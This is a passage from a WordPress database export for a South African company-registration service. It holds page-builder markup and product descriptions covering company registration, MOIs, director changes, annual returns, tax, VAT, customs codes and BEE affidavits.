src=\"https://companyregistration.online/wp-content/uploads/2019/06/Mobicred.png\" _builder_version=\"3.24.1\" transform_scale=\"60%|60%\" custom_margin=\"0px||\" custom_padding=\"13px||0px|||\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_6\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/06/Visa.png\" _builder_version=\"3.24.1\" transform_scale=\"60%|60%\"][/et_pb_image][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/06/Visa-Electron.png\" _builder_version=\"3.24.1\" transform_scale=\"60%|60%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_6\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/06/Mastercard-horizontal-01.png\" _builder_version=\"3.24.1\" transform_scale=\"60%|60%\"][/et_pb_image][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/06/masterpass-1.png\" _builder_version=\"3.24.1\" transform_scale=\"60%|60%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_6\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/06/SCode-stacked-logo.jpg\" _builder_version=\"3.24.1\" transform_scale=\"60%|60%\" custom_margin=\"-11px||\" custom_padding=\"0px||\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section]','Cart','','publish','closed','closed','','cart','','','2019-07-18 15:22:27','2019-07-18 13:22:27','',0,'https://companyregistration.online/cart/',0,'page','',0),(6,1,'2016-03-11 22:00:07','2016-03-11 20:00:07','<!-- wp:divi/placeholder -->\n\n[et_pb_section][et_pb_row][et_pb_column type=\"4_4\"][et_pb_text][woocommerce_checkout][/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]\n\n<!-- /wp:divi/placeholder -->','Checkout','','publish','closed','closed','','checkout','','','2019-07-18 15:10:49','2019-07-18 13:10:49','',0,'https://companyregistration.online/checkout/',0,'page','',0),(7,1,'2016-03-11 22:00:07','2016-03-11 20:00:07','[woocommerce_my_account]','My Account','','publish','closed','closed','','my-account','','','2017-11-01 15:30:09','2017-11-01 13:30:09','',0,'https://companyregistration.online/my-account/',0,'page','',0),(9,1,'2016-03-11 22:06:22','2016-03-11 20:06:22','Company Registration','New Company Registration','','inherit','open','closed','','new-company-registrations-category-image-sqaured','','','2016-03-11 22:07:25','2016-03-11 20:07:25','',0,'https://companyregistration.online/wp-content/uploads/2016/03/New-Company-registrations-category-image-sqaured.png',0,'attachment','image/png',0),(10,1,'2016-03-11 22:08:45','2016-03-11 20:08:45','Tax Registration ','Tax Registration','','inherit','open','closed','','tax-registration-category-cover-final-squared','','','2016-03-11 22:09:01','2016-03-11 20:09:01','',0,'https://companyregistration.online/wp-content/uploads/2016/03/Tax-Registration-category-Cover-Final-squared.png',0,'attachment','image/png',0),(13,1,'2016-03-17 21:03:15','2016-03-17 19:03:15','','Company Registration','','publish','closed','closed','','company-registration','','','2016-03-18 19:16:36','2016-03-18 17:16:36','',0,'https://companyregistration.online/?post_type=wr_cf_post_type&#038;p=13',0,'wr_cf_post_type','',0),(14,1,'2016-03-12 19:37:34','2016-03-12 17:37:34','','companyregistration business card','','inherit','open','closed','','companyregistration-business-card','','','2016-03-12 19:49:06','2016-03-12 17:49:06','',2,'https://companyregistration.online/wp-content/uploads/2016/03/companyregistration-business-card.png',0,'attachment','image/png',0),(28,1,'2016-03-12 20:06:31','2016-03-12 18:06:31','A private company registration is the most common and simplest form of company to be registered. It is comparable to a close corporation. <strong><span style=\"color: #ff0000;\">NOTE: Close corporations can no longer be registered.</span></strong>\r\n<ul>\r\n 	<li>If the company is owner managed, an <em><strong>audit is no longer required</strong></em>, resulting in cost savings. However financials statements still have to be prepared.</li>\r\n 	<li>Most private companies are owner managed and tend to have a smaller number of directors.</li>\r\n 	<li>Private Companies may not offer shares to the public and restrictions are also placed on the transferability of their shares.</li>\r\n 	<li>Private companies must have at least one director and one<em> incorporator</em>. The director and incorporator may be the same person. The word “person” includes a <a href=\"https://companyregistration.online/faqs/what-is-the-difference-between-natural-person-and-juristic-person/\" target=\"_blank\" rel=\"noopener noreferrer\">juristic entity</a>. This means that a legal entity or a trust may be an incorporator of a new company.</li>\r\n</ul>\r\nAll companies must have a <a href=\"https://companyregistration.online/faqs/what-is-a-memorandum-of-incorporation/\" target=\"_blank\" rel=\"noopener noreferrer\">Memorandum of Incorporation (MOI)</a> which sets out the rules agreed by the shareholders for the management and maintenance of the business.\r\n\r\nPrivate companies may be registered with a standard or a customised MOI. The standard MOI is provided by law and is integrated into the company registration process.\r\n\r\nThis company is registered with a standard MOI, refer to the \'What are you purchasing\" tab below','Private Company - Owner Managed','This private company registration is for small to medium businesses. Recommended for directors who intend managing their business themselves, i.e. the director and the owner is the same person.\r\n\r\n<span style=\"color: #800080;\"><strong>Service turnaround time</strong></span>\r\n5 working days from date of submission of the supporting documentation.','publish','open','closed','','private-company-with-a-standard-moi-basic','','','2019-08-14 09:52:16','2019-08-14 07:52:16','',0,'https://companyregistration.online/?post_type=product&#038;p=28',0,'product','',0),(30,1,'2016-03-12 20:14:07','2016-03-12 18:14:07',' ','','','publish','closed','closed','','30','','','2016-03-28 19:54:25','2016-03-28 17:54:25','',0,'https://companyregistration.online/?p=30',5,'nav_menu_item','',0),(31,1,'2016-03-12 20:14:07','2016-03-12 18:14:07',' ','','','publish','closed','closed','','31','','','2016-03-28 19:54:25','2016-03-28 17:54:25','',0,'https://companyregistration.online/?p=31',2,'nav_menu_item','',0),(32,1,'2016-03-12 20:14:07','2016-03-12 18:14:07',' ','','','publish','closed','closed','','32','','','2016-03-28 19:54:25','2016-03-28 17:54:25','',0,'https://companyregistration.online/?p=32',3,'nav_menu_item','',0),(33,1,'2016-03-12 20:14:07','2016-03-12 18:14:07',' ','','','publish','closed','closed','','33','','','2016-03-28 19:54:25','2016-03-28 17:54:25','',0,'https://companyregistration.online/?p=33',4,'nav_menu_item','',0),(34,1,'2016-03-12 20:14:07','2016-03-12 18:14:07',' ','','','publish','closed','closed','','34','','','2016-03-28 19:54:25','2016-03-28 17:54:25','',0,'https://companyregistration.online/?p=34',1,'nav_menu_item','',0),(36,1,'2016-03-12 20:31:03','2016-03-12 18:31:03','','Legal','','publish','closed','closed','','legal','','','2018-05-20 12:35:57','2018-05-20 10:35:57','',0,'https://companyregistration.online/?p=36',1,'nav_menu_item','',0),(45,1,'2016-03-14 09:30:01','2016-03-14 07:30:01',' ','','','publish','closed','closed','','45','','','2019-06-18 11:33:27','2019-06-18 09:33:27','',0,'https://companyregistration.online/uncategorized/45/',6,'nav_menu_item','',0),(52,1,'2016-03-18 19:14:03','2016-03-18 17:14:03','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"3.22.3\"][et_pb_row admin_label=\"row\" _builder_version=\"3.22.3\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\"][et_pb_text admin_label=\"Text\" _builder_version=\"3.24\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"]<iframe frameborder=\"0\" style=\"height:500px;width:99%;border:none;\" src=\'https://forms.zohopublic.com/mawincnetwork/form/CompanyRegistration/formperma/mdk0h2jkaD4fmb0Fed11B5_Fh\'></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Private company registration form','','publish','closed','closed','','private-company-registration-form','','','2019-06-13 16:32:49','2019-06-13 14:32:49','',0,'https://companyregistration.online/?page_id=52',0,'page','',0),(54,1,'2016-03-17 21:27:37','2016-03-17 19:27:37','13','Company Registration','','publish','closed','closed','','company-registration','','','2016-03-17 21:27:37','2016-03-17 19:27:37','',0,'https://companyregistration.online/uncategorized/company-registration/',0,'wr_cfsb_post_type','',0),(62,2,'2016-03-28 18:24:00','2016-03-28 16:24:00','Typically you may want to customise the MOI if the directors and shareholders are different people.\r\n\r\nAlterable provisions within the Companies Act, 2008:\r\n<ul>\r\n 	<li>A company has all the legal powers and capacity of an individual, except to the extent that\r\n<ul>\r\n 	<li>A juristic person is incapable of exercising any such powers, or having any such capacity; or</li>\r\n 	<li>The company’s MOI provides otherwise (e.g. the MOI may state that no director may contract on behalf of the company in his/her own capacity).</li>\r\n</ul>\r\n</li>\r\n 	<li>Private, non-profit and incorporated companies may elect to comply with the extended accountability requirements;</li>\r\n 	<li>Shares within the same class has the same rights, limitations and terms, unless the MOI provides otherwise;</li>\r\n 	<li>MOI may exclude the right of first refusal of current shareholders of a private company in respect of shares issued by the company;</li>\r\n 	<li>MOI may forbid the board to render financial assistance to parties wanting to acquire shares in the company;</li>\r\n 	<li>MOI may provide for longer minimum notice periods for meetings;</li>\r\n 	<li>Electronic notice and electronic participation in meetings are allowed unless MOI prohibits it;</li>\r\n 	<li>Companies may determine a higher number of minimum directors than what the Act prescribes.</li>\r\n</ul>\r\n<!--more-->\r\n\r\nUnalterable provisions are provisions of the Act which the company may not change, such as directors’ duties and responsibilities and enhanced accountability requirements for public and state owned companies. In instances where the MOI is in conflict with the Act, the Companies Act will prevail. In addition, the Act allows for companies to add provisions to address matters applicable to that company, not addressed in the Act itself, but all provisions of the MOI must be consistent with the Act. The Memorandum of Incorporation contains the following information:\r\n<ul>\r\n 	<li>Detail of Incorporators</li>\r\n 	<li>Number of directors and alternate directors</li>\r\n 	<li>Share capital (maximum issued)</li>\r\n 	<li>Content of MOI</li>\r\n</ul>\r\nThe memorandum of incorporation (MOI) determines the minimum number of directors and alternate directors, which, in the case of a private company may not be less than one director. A customised MOI will also set out the eligibility requirements for a director as well as the directors\' term of office. In the case of a standard MOI, the term of office is indefinite and there is no restriction on the number of directors.','Private Company customised MOI','<strong>\r\nTypically you may want to customise the MOI [<span style=\"color: #993366;\">Memorandum of Incorporation</span>] if the directors and shareholders are different people.</strong>\r\n\r\n<strong>Why would you want to customise the MOI?\r\n</strong>In order to impose restrictions on the management and ownership or if you wish to limit the business activities the company can undertake. You will accordingly need to ring-fence certain provisions of the MOI. Refer to detail below or contact us.\r\n\r\n<strong><span style=\"color: #800080;\">Service Turnaround Time</span>\r\n</strong>This process takes 26-30 working days after receiving the requested supporting documentation.','publish','open','closed','','private-company-customised-moi-full','','','2019-06-14 08:47:16','2019-06-14 06:47:16','',0,'https://companyregistration.online/?post_type=product&#038;p=62',0,'product','',0),(64,2,'2016-03-18 22:18:40','2016-03-18 20:18:40','An association of professionals such as\r\n<ul>\r\n 	<li>Lawyers,</li>\r\n 	<li>Doctors,</li>\r\n 	<li>Accountants</li>\r\n 	<li>Civil Engineers</li>\r\n 	<li>etc,</li>\r\n</ul>\r\nmay be registered as a <strong>personal liability company</strong>.','Personal Liability Company','A Personal Liability Company specifically suits professionals who want to register a company for his or her practice.\r\n\r\nA Personal Liability Company also known as a ”INC” is another type of company that does not differ much from a (Pty) Ltd.\r\n\r\nThe only difference is that the <strong>directors</strong> are <strong>mutually and individually liable</strong> with the company for <strong>all company debts and liabilities</strong> incurred.\r\n\r\nA Personal Liability Company ends with “Inc.” or “Incorporated”\r\n\r\n<span style=\"color: #800080;\"><strong>Service Turnaround Time\r\n</strong></span>21-30 working days after receiving the requested supporting documentation.','publish','open','closed','','personal-liability-company','','','2018-05-06 18:52:00','2018-05-06 16:52:00','',0,'https://companyregistration.online/?post_type=product&#038;p=64',0,'product','',0),(65,2,'2016-03-29 06:44:35','2016-03-29 04:44:35','Vacancies on the board arise if a director:\r\n<ul>\r\n 	<li>resigns or dies</li>\r\n 	<li>ceases to hold the office, title or designation in the company that entitles the person to be an ex officio director,</li>\r\n 	<li>becomes incapacitated or disqualified or</li>\r\n 	<li>is removed.</li>\r\n</ul>\r\nA director may be removed by:\r\n<ul>\r\n 	<li>An ordinary resolution adopted at a shareholders\' meeting by the persons entitled to exercise voting rights in the election of that director. The director concerned must be given notice of the meeting and the resolution, at least equivalent to that which a shareholder is entitled to receive, regardless of whether the director is a shareholder. The director must be afforded a reasonable opportunity to make a presentation in person or through a representative to the meeting before the resolution is put to a vote.</li>\r\n 	<li>A resolution of the board because it has determined that the director in question has become ineligible or disqualified in terms of section 69 of the Act, is unable to perform the functions of a director and is unlikely to regain that capacity within a reasonable time or has neglected or been derelict in the performance of the functions of a director.</li>\r\n 	<li>An order of the court confirming the resolution of the board or removing the director from office if the court is satisfied that the director is ineligible or disqualified, incapacitated, or has been negligent or derelict.</li>\r\n 	<li>A director may be appointed by the Board of Directors, unless the Memorandum requires shareholder approval.</li>\r\n</ul>','Change In Director/s','Appoint, resign or remove a director here.\r\n\r\nWhen a company is registered the directors are automatically appointed as part of the registration process.\r\n\r\nThis service is for changes that you would like to make thereafter.\r\n\r\n<strong><span style=\"color: #800080;\">Service Turnaround Time</span>\r\n</strong>This process takes 5-10 working days after receiving the requested supporting documentation.\r\n\r\n&nbsp;','publish','open','closed','','change-in-directors','','','2018-05-12 18:52:02','2018-05-12 16:52:02','',0,'https://companyregistration.online/?post_type=product&#038;p=65',0,'product','',0),(67,2,'2016-03-29 06:59:33','2016-03-29 04:59:33','','Change in CC Member/s','Close Corporation member changes or CC member changes are made if a CC wants to remove or add a member from the business.\r\n\r\nOnce a member is removed or added, the ownership will change as well.\r\n\r\n<strong><span style=\"color: #800080;\">Service Turnaround Time</span>\r\n</strong>This process takes 5-10 working days after receiving the requested supporting documentation.','publish','open','closed','','change-in-members','','','2017-06-19 13:41:15','2017-06-19 11:41:15','',0,'https://companyregistration.online/?post_type=product&#038;p=67',0,'product','',0),(68,2,'2016-03-29 07:40:05','2016-03-29 05:40:05','The registered address of a company is very important, as it is the address at which any legal documents will be served on the company.\r\n\r\nCompanies are <strong>required by law</strong> to ensure that this <strong>information is up to date</strong>, and maybe liable for a fine or prosecution if it is found that the information is not up to date.\r\n\r\nThe Companies Act requires all companies to keep records of their minutes, resolutions and decisions, as well as the financial statements and share register <strong>at a location that has been declared</strong>.\r\n\r\nA notice of the location of the company records must be filed with the CIPC only if the company records are not kept at its registered office or address.\r\n\r\n&nbsp;','Change in Company Address','Changing of a company’s particulars, such as the registered business address and postal address.\r\n\r\n<strong><span style=\"color: #800080;\">Service Turnaround Time</span>\r\n</strong>This process takes 5-10 working days after receiving the requested supporting documentation.','publish','open','closed','','change-in-company-address','','','2017-06-19 13:40:18','2017-06-19 11:40:18','',0,'https://companyregistration.online/?post_type=product&#038;p=68',0,'product','',0),(69,2,'2016-03-29 07:51:11','2016-03-29 05:51:11','The registered address of a Close Corporation is very important, as it is the address at which any legal documents will be served on the company.\r\n\r\nClose Corporations are <strong>required by law</strong> to ensure that this information is up to date, and maybe <strong>liable for a fine or prosecution</strong> if it is found that the information is not up to date.\r\n\r\nThe Companies Act requires all companies to keep records of their minutes, resolutions and decisions, as well as the financial statements and share register at a location that has been declared.\r\n\r\nA notice of the location of the company records must be filed with the CIPC only if the company records are not kept at its registered office or address.\r\n\r\n&nbsp;','Change in Close Corporation Address','Changing of a Close Corporation particulars, such as the registered business address and postal address.\r\n\r\n<strong><span style=\"color: #800080;\">Service Turnaround Time</span>\r\n</strong>This process takes 15-30 working days after receiving the requested supporting documentation.','publish','open','closed','','change-in-close-corporation-address','','','2017-06-19 13:39:57','2017-06-19 11:39:57','',0,'https://companyregistration.online/?post_type=product&#038;p=69',0,'product','',0),(70,2,'2016-04-06 15:37:46','2016-04-06 13:37:46','Annual Return is a short description of the most relevant information of a company, also known as Annual Company Renewal. The purpose of an Annual Return is to confirm that the company is trading or will be trading in the future. All companies and close corporations are required by law to file and pay their annual returns with CIPC every year on the anniversary of the company or close corporation registration date. If these returns are not filed and paid on time, it will incur penalties and can even lead to de-registration of the company followed by the freezing of the company’s bank account as well.\r\n\r\nThere is, however, a difference between <strong>Annual Returns</strong> and <strong>SARS Tax Returns</strong>. An Annual Return is like a ‘revival’ for the company and confirms whether CIPC has the most recent information of the company and that the company is still in business. A Tax Return is filed with SARS and focuses on the taxable earnings of a company in order to determine the tax accountability of the company to the State.','Annual Returns','All companies (including external companies) and close corporations are required by law to lodge their Annual Returns with CIPC within a certain period of time every year.\r\n\r\nThe <strong>cost</strong> above is our fee for each year the Annual Return is outstanding <strong>only</strong>, <span style=\"color: #993366;\"><strong>it excludes the CIPC fee</strong></span> which is dependent on\r\n<ul>\r\n 	<li>turnover and</li>\r\n 	<li>any CIPC penalties due for late submission of the return.</li>\r\n</ul>\r\nThis will be determined once we have your company details. The fee payable will be communicated and the return will only be filed once we have received proof of payment.\r\n<h4 style=\"text-align: left;\"><span style=\"color: #333399;\"><strong>NB: </strong><span style=\"color: #000000;\">Non-submission can lead to your company being put into the de-registration<strong> process and ultimately de-registered.  </strong>Additional cost will have to incurred to <span style=\"text-decoration: underline;\"><span style=\"color: #00ccff; text-decoration: underline;\"><a style=\"color: #00ccff; text-decoration: underline;\" href=\"https://companyregistration.online/shop/maintaning-our-company/company-and-close-corporations-restorations/\">restore</a></span></span> the company.<strong>\r\n</strong></span></span></h4>\r\n<span style=\"color: #800080;\"><strong>Service Turnaround Time</strong></span>\r\n<ul>\r\n 	<li>The Annual Return process takes up to 24 hours.</li>\r\n</ul>','publish','open','closed','','annual-returns','','','2018-05-06 11:18:25','2018-05-06 09:18:25','',0,'https://companyregistration.online/?post_type=product&#038;p=70',0,'product','',0),(71,2,'2016-04-01 16:46:11','2016-04-01 14:46:11','The position of an auditor or an audit committee member may not remain vacant for more than 40 business days, while a company secretarial vacancy must be filled within 60 business days. .  An auditor may serve a maximum of five consecutive financial years.\r\n\r\n&nbsp;','Appointment, Resignation and Removal of Auditors or Company Secretary','','pending','open','closed','','appointment-resignation-and-removal-of-auditors-or-company-secretary','','','2016-04-08 06:37:07','2016-04-08 04:37:07','',0,'https://companyregistration.online/?post_type=product&#038;p=71',0,'product','',0),(72,2,'2016-04-01 16:43:47','2016-04-01 14:43:47','<strong>CIPC will only re-instate a company or close corporation if:</strong>\r\n<ul>\r\n 	<li>The company or close corporation was in business at the time of deregistration.</li>\r\n 	<li>Immovable property is registered in the name of the deregistered business; or</li>\r\n 	<li>The court issued an order re-instating the company or close corporation.</li>\r\n</ul>\r\nIf none of the above can be proven by the documentary evidence, the CIPC will not re-instate the company or close corporation and it is advised that a <a href=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-full/\">new company be registered</a><strong>. </strong>If you are unsure on how to proceed <a href=\"https://companyregistration.online/contact-us/\">contact us</a>.','Company and Close Corporations Restorations','The Company/Close Corporation Restoration is a process by which a CC/Company gets re-registered after being de-registered. The main cause of de-registration of a CC/Company is failure to submit Annual Returns.\r\n\r\n<strong>NOTE</strong>: The above fee does not include fees related to the submission of any outstanding <a href=\"https://companyregistration.online/shop/maintaning-your-company/annual-returns/\">Annual Returns.</a>\r\n\r\n<strong><span style=\"color: #800080;\">Service Turnaround Time\r\n</span></strong><span style=\"color: #000000;\"><span style=\"color: #333333;\">Depends whether property is owned by the Company or Close Corporation</span>.\r\n</span>If property is <strong>not owned</strong>  21 -30 working days.\r\nIf property is <strong>owned</strong> 2-4 months.\r\n\r\n<strong>NB</strong>: Delays may be due to excessive CIPC workload and or obtaining letters from the Department of National Treasury and the Depatment of Public Works.\r\n\r\nWe will update you on a weekly basis regarding the status of the restoration process.','publish','open','closed','','company-and-close-corporations-restorations','','','2017-06-19 13:37:29','2017-06-19 11:37:29','',0,'https://companyregistration.online/?post_type=product&#038;p=72',0,'product','',0),(73,2,'2016-04-01 16:36:36','2016-04-01 14:36:36','<h4>Keep Your Company Registers Online</h4>\r\nAll our company is kept in a cloud on offsite servers making more secure.  If you’re keeping these records on paper, it’s so easy for them to get lost or destroyed.  Even if you’re using your own server, your office gets broken into, and your data walks out the door and never comes back.\r\n\r\nWith our Company Registers, your data will automatically be backed up for free every day, and stored in multiple locations, so that nothing short of a global catastrophe can harm your work.\r\n\r\nWe store all your minutes, resolutions and other documents.\r\n\r\nJust a few more reasons to use our Company Register service:\r\n<ul>\r\n 	<li>Free backups</li>\r\n 	<li>Fireproof</li>\r\n 	<li>Our data can’t get lost, gauranteed</li>\r\n 	<li>Printed reports / registers</li>\r\n 	<li>Share certificates</li>\r\n</ul>\r\nThe registers include:\r\n<ul>\r\n 	<li>Auditors, Company Secretaries, Public Officer information</li>\r\n 	<li>Authorised Securities, Allotments, Transfers</li>\r\n 	<li>Securities Accounts</li>\r\n 	<li>Minutes / Resolutions / Documents / CIPC Forms</li>\r\n 	<li>Directors details past and present</li>\r\n</ul>\r\n&nbsp;','Company Register','S50(1) Every company must-\r\n<ol>\r\n 	<li>(a)establish or cause to be established a register of its issued securities in the prescribed form; and</li>\r\n 	<li>(b)maintain its securities register in accordance with the prescribed standards.</li>\r\n</ol>\r\nThis purchase is for maintaining the company register for one year and is renewal each year.\r\n\r\nThe reports or registers can be requested at any time from our offices.','publish','open','closed','','company-register','','','2019-08-26 16:24:39','2019-08-26 14:24:39','',0,'https://companyregistration.online/?post_type=product&#038;p=73',0,'product','',0),(74,2,'2016-03-29 21:08:00','2016-03-29 19:08:00','A company must be registered with the Company Intellectual Property Commission (CIPC) to obtain a registration number.\r\nThe company will then be registered automatically as a taxpayer. A company which does not hear from SARS after registering with CIPC, must contact their nearest SARS office.\r\n\r\nWe will contact SARS on your behalf.\r\n\r\nIf a company is not yet registered with SARS, they will, for security reasons, need to do their first-time registration at a SARS branch. They will not be able to register for the first time via e-Filing.\r\n\r\nDepending on other factors such as turnover, payroll amounts, whether involved in imports and exports etc, a taxpayer could also be liable to register for other taxes, duties, levies and contributions such as Value Added Tax (VAT), Pay-As-You-Earn (PAYE), Customs, Excise, Skills Development Levy (SDL) and Unemployment Insurance Fund (UIF) contributions','Business Income Tax Registration','Once a company is registered an Income Tax number is automatically issued by SARS.  However there are times when we have to inquire from SARS in order to obtain the number.\r\n\r\n<strong>NB: If you registered a company through this website we will obtain the Income Tax number at no charge.</strong>\r\n\r\n<strong><span style=\"color: #800080;\">Turnaround times\r\n</span></strong>1-2 days after receipt of the required documentation, refer to \'What we require Tab\' below.','publish','open','closed','','income-tax-registration','','','2019-08-15 15:44:08','2019-08-15 13:44:08','',0,'https://companyregistration.online/?post_type=product&#038;p=74',0,'product','',0),(75,2,'2016-03-18 23:55:01','2016-03-18 21:55:01','Pay-as-you-earn (PAYE) or Employees’ Tax is a tax that is deducted from an employees’ income and paid to SARS on a monthly basis. Once a company has employees, it is obliged to register for PAYE.\r\n\r\n<strong>SKILL DEVELOPMENT LEVY (SDL)</strong>\r\n\r\nSDL is payable by employers at a rate of 1% of the remuneration (salary) paid to employees. Employers paying annual remuneration for less than R500 000 in a year are exempt from paying SDL.\r\n\r\n<strong>UIF (SARS)</strong>\r\n\r\nUIF is payable monthly by employers on the basis of a contribution of 1% by employers and 1% by employees, based on employees’ remuneration (salary) below a certain amount.','Salary Tax Registration (PAYE)','Pay-as-you-earn (PAYE) or Employees’ Tax is a tax that is deducted from an employees’ income and paid to SARS on a monthly basis. Once a company has employees, it is obliged to register for PAYE.\r\n\r\nIncludes UIF and SDL [Skills Development Levy] registrations with SARS.\r\n\r\n<strong><span style=\"color: #800080;\">Service Turnaround Time</span>\r\n</strong>This process takes 1-2 working days after receiving the requested supporting documentation.','publish','open','closed','','salary-tax-registration-paye','','','2017-06-19 13:48:45','2017-06-19 11:48:45','',0,'https://companyregistration.online/?post_type=product&#038;p=75',0,'product','',0),(76,2,'2016-03-18 23:57:38','2016-03-18 21:57:38','A TCC will only be issued by SARS where the following requirements have been met:\r\n<ul>\r\n 	<li>The taxpayer must have registered for an Income Tax reference number prior to applying for a TCC.</li>\r\n 	<li>No outstanding debt for all taxes (including Secondary Tax on Companies (STC), Administrative Penalties and Employees’ Tax).</li>\r\n 	<li>Any deferred arrangements made are being adhered to.</li>\r\n 	<li>All returns and/or declarations must be up to date and in the process of being assessed by SARS.</li>\r\n 	<li>All tax reference numbers must be active and correct, e.g. the tax reference number must not be de-registered or suspended on the SARS system.</li>\r\n 	<li>The registration details on the TCC01 must correspond with the information on the SARS systems.</li>\r\n</ul>\r\n<strong>Top Tip:</strong> A TCC is only valid for one year from the date of issue in respect of a tender and/or good standing, provided the taxpayer remains compliant with SARS requirements.','Tax Clearance Certificate','You can apply for a Tax Clearance Certificate (TCC) to validate your status of a taxpayer. A TCC may also be required for:\r\n<ol>\r\n 	<li>Tenders – when applying for a tender or bid advertised</li>\r\n 	<li>Good standing - to confirm that you or your business is tax compliant</li>\r\n 	<li>Foreign investment allowance (FIA)</li>\r\n 	<li>Emigration.</li>\r\n</ol>\r\nThis purchase is for 1 &amp; 2 above only.\r\n\r\nFor 3 &amp; 4 please <a href=\"https://companyregistration.online/contact-us/\">contact us</a>.\r\n\r\n<span style=\"color: #800080;\"><strong>Service turnaround time\r\n</strong><span style=\"color: #000000;\">1-2 days if all of your tax affairs are in order. If not, <a href=\"https://companyregistration.online/contact-us/\">contact us</a> and we will inquire from SARS what is required in order to obtain the tax clearance certificate.</span></span>\r\n\r\nWe will contact you to obtain the required information.','publish','open','closed','','tax-clearance-certificate','','','2018-05-06 19:08:04','2018-05-06 17:08:04','',0,'https://companyregistration.online/?post_type=product&#038;p=76',0,'product','',0),(77,2,'2016-03-19 00:01:27','2016-03-18 22:01:27','<h4>What is VAT?</h4>\r\nValue-Added Tax is commonly known as VAT. VAT is an indirect tax on the consumption of goods and services in the economy. Revenue is raised for government by requiring certain businesses to register and to charge VAT on the taxable supplies of goods and services. These businesses become vendors that act as the agent for government in collecting the VAT.\r\n\r\nVAT is charged at each stage of the production and distribution process and it is proportional to the price charged for the goods and services.\r\n\r\nVAT is presently levied at the standard rate of 14% on the supply of most goods and services and on the importation of goods. The VAT on the importation of goods is collected by customs. There is a limited range of goods and services which are subject to VAT at the zero rate or are exempt from VAT.\r\n\r\n&nbsp;','VAT Registration','Any person that carries on a business may register for VAT. The term person is not only limited to companies but also includes, amongst others, individuals, partnerships, trust funds, foreign donor funded projects and municipalities.\r\n\r\nIt is <span style=\"color: #ff0000;\">mandatory</span> for a person to register for VAT if sales made from selling goods or services is in excess of R1 million in any consecutive twelve month period.\r\n\r\nIn order to register, an application form must be completed and a specific process must be followed.\r\n\r\n<span style=\"color: #800080;\"><strong><span style=\"color: #800080;\">Service Turnaround</span><span style=\"color: #800080;\"> Time</span><span style=\"color: #800080;\">\r\n</span></strong><span style=\"color: #000000;\">5-7 working days after receiving all the required supporting documentation, however if SARS requires a site audit this can take between 30-45 days. </span>\r\n</span>','publish','open','closed','','vat-registration','','','2017-06-19 13:47:54','2017-06-19 11:47:54','',0,'https://companyregistration.online/?post_type=product&#038;p=77',0,'product','',0),(78,2,'2016-03-19 00:05:10','2016-03-18 22:05:10','<p style=\"text-align: justify;\">All individuals/businesses and trusts wishing to move goods into or out of the country <strong>are required by law</strong> to be in <strong>possession of a licens</strong>e in order to do so.</p>\r\n<p style=\"text-align: justify;\">A license number (custom code) is required to complete the bill of entry/exit in order for customs to release any cargo coming in or out. This same custom code is required by the bank to either make or receive payments for goods bought or sold.</p>\r\n<p style=\"text-align: justify;\">Licenses (or custom codes) do not need to be renewed, they do not expire and are not subject to annual fees. Once you have been issued with your license it will remain active for as long as it is used.</p>\r\n<p style=\"text-align: justify;\">This license enables you to import or export general, unrestricted merchandise. A few categories of merchandise have restrictions from the government and require a special permit to when importing or exporting. Examples of these categories are goods of plant or animal origin, second hand goods, tyres and tyre casing, vehicles, nutritional supplements etcetera.</p>\r\n<p style=\"text-align: justify;\">MCC stands for Medical Control Council. Any medicine or nutritional supplement that is imported and/or sold in South Africa needs to be registered under the importer’s/seller’s name at the MCC. Without MCC registration customs will not allow these items into the country.</p>\r\n<p style=\"text-align: justify;\">Unless your specific merchandise is a restricted by the government, there is no limit to how much you can bring in on one license.</p>\r\nNB: Excludes Exporter registration under Preferential Trade Agreements','Import and Export Code Registration','All importers and exporters must have a customs code, irrespective how low the rand value of import/export is. The reason for this is that customs is now keeping a closer record of all movement of goods  flowing in and out of the country.\r\n\r\nNB: Excludes Exporter registration under Preferential Trade Agreements\r\n\r\n<strong><span style=\"color: #800080;\">Service Turnaround Time</span>\r\n</strong>This process takes 2-10 working days after receiving the requested supporting documentation.','publish','open','closed','','import-and-export-code-registration','','','2017-06-19 13:47:18','2017-06-19 11:47:18','',0,'https://companyregistration.online/?post_type=product&#038;p=78',0,'product','',0),(79,2,'2016-03-29 06:29:04','2016-03-29 04:29:04','<h4>So what can your BEE Affidavit be used for?</h4>\r\nEntities use their BEE Affidavit to claim points for procurement and thus the more an entity utilises BEE suppliers that are compliant, the higher their chance of getting a high level Bee Certificate.\r\n\r\nFor anyone currently operating a business in South Africa, it is imperative to have a BEE Affidavit/Certificate.\r\n<h5>EMEs automatically qualify as follows:</h5>\r\n<ul>\r\n 	<li>&lt; 51% Black owned will qualify for 100% recognition level - <span style=\"color: #ff6600;\">Level 4</span></li>\r\n 	<li>At Least 51% but Black owned will qualify for 125% recognition level - <span style=\"color: #ff6600;\">Level 2</span></li>\r\n 	<li>At least 100% Black Owned will qualify for 135% recognition level -<span style=\"color: #ff6600;\"> Level 1</span></li>\r\n</ul>\r\nA Bee Affidavit is valid for 1 year and has to be renewed annually.\r\n\r\nCheck your certificate or affidavit to ensure that you have a valid BEE document; or you could miss that potential sale or tender.\r\n\r\n&nbsp;','BEE Affidavit','From the 1st May 2015; the only requirement for a BEE <a href=\"https://companyregistration.online/what-is-exempted-micro-enterprise-eme/\" target=\"_blank\" rel=\"noopener\">Exempt Micro Enterprise [ EME ]</a> Certificate, is a Sworn Affidavit confirming turnover for the past 12 months and the level of black ownership of the company.\r\n\r\nWe can provide you 